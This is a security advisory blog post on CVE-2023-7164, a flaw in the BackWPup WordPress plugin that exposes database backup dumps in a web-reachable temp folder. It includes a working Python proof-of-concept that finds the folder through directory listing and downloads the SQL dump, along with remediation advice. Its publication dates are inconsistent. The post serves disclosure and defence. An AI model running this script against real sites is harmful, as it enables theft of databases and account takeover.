A critical vulnerability, CVE-2023-7164, has been uncovered in the popular WordPress plugin BackWPup, impacting over 600,000 active installations. This flaw exposes sensitive data and paves the way for potential account takeovers, posing a severe threat to website security.
Main info:
| CVE | CVE-2023-7164 |
| Plugin | BackWPup < 4.0.4 |
| Critical | Very High |
| All Time | 13 960 177 |
| Active installations | 600 000+ |
| Publicly Published | March 17, 2023 |
| Last Updated | March 17, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7164 https://wpscan.com/vulnerability/79b07f37-2c6b-4846-bb28-91a1e5bf112e/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| December 13, 2023 | Plugin testing and vulnerability detection in the BackWPup plugin have been completed |
| December 13, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| March 17, 2024 | Registered CVE-2023-7164 |
Discovery of the Vulnerability
During routine testing, security researchers identified a vulnerability in the logic of the directory /wordpress/wp-content/uploads/backwpup-{hash}-temp. This oversight exposes comprehensive details about the website’s configuration, directories, and files, granting unauthorized access to sensitive data stored within the database and all associated files.
Understanding of Sensitive Data Exposure attack’s
Sensitive Data Exposure occurs when an attacker gains unauthorized access to confidential information, such as user credentials or system configurations. In the case of BackWPup, this vulnerability allows attackers to view and download backup files containing critical data, including database dumps, facilitating account takeovers and compromising the entire system.
Exploiting the Sensitive Data Exposure Vulnerability
Exploiting this vulnerability involves manually triggering a backup process or exploiting the plugin’s automatic backup feature. By accessing the backup directory, attackers can download sensitive files, including database dumps, and use them to launch further attacks, such as brute force attacks on password hashes.
POC:
- 1) The plugin has the ability to automatically backup , but for the speed of the POC, I will do it manually, but this is similar to automatic scanning.
- 2) There is a lot of sensitive data and most importantly, you can download a backup file and upload it to your local car:
- “http://your_site/wordpress/wp-content/uploads/backwpup-{hash}-temp/wordpress_db.sql“
- 3) The exploit first accesses /wordpress/wp-content/uploads and parse the name of the backup folder with a hash, and then waits for the backup to start and a file with a database dump appears. This vulnerability works because practically every wordpress site has a directory listing along the path /wordpress/wp-content/uploads and you can view the folder names. Therefore, you should move this folder to wp-content or to any other folder where there is index.php
import requests import time import threading from bs4 import BeautifulSoup base_url = "http://127.0.0.1/wordpress/wp-content/uploads/" print(f"Checking directory listing at {base_url}") def get_directory_listing(url): try: response = requests.get(url) if response.status_code == 200: return response.text except requests.RequestException as e: print(f"Error when requesting to {url}: {e}") return None def check_url(url): while True: try: response = requests.get(url) if response.status_code == 200: print(f"File at {url} found! I display the contents...") print(response.text) except requests.RequestException as e: print(f"Error when requesting to {url}: {e}") time.sleep(0.5) listing_html = get_directory_listing(base_url) if listing_html: soup = BeautifulSoup(listing_html, 'html.parser') target_folder = None for link in soup.find_all('a'): if 'backwpup' in link.get('href') and 'temp' in link.get('href'): target_folder = link.get('href') break if target_folder: target_url = f"{base_url}{target_folder}/wordpress_db.sql" print(f"Checking the following URL for wordpress_db.sql: {target_url}") thread = threading.Thread(target=check_url, args=(target_url,)) thread.start() else: print("Target folder not found in the directory listing.") else: print("Error retrieving directory listing.")___
The consequences of this vulnerability are dire, potentially leading to unauthorized access to sensitive data, website defacement, or even complete system compromise. Attackers could exploit this flaw to steal sensitive information, compromise user accounts, or deploy malware, posing significant risks to website owners and users.
Recommendations for Improved Security
To mitigate the risk posed by CVE-2023-7164, website administrators are strongly advised to update the BackWPup plugin to the latest version immediately. Additionally, securing the backup directory by restricting access or relocating it to a directory with an index.php file can prevent unauthorized access. Regular security audits and monitoring are also recommended to detect and mitigate vulnerabilities proactively.
By taking proactive measures to address Sensitive Data Exposure vulnerabilities like CVE-2023-7164, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #SensitiveDataExposure #WebsiteSafety #StayProtected #VeryHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
